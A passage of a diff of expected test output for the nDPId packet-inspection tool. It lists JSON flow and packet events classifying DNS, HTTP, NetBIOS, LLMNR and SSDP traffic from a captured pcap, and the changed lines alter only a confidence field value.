-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="} 
-00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1470104378021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104378045,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378045,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRgAAAER5c3AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104378045,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104378045,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxQAAAER6ZvAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378045,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEEAAAER2QnAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": 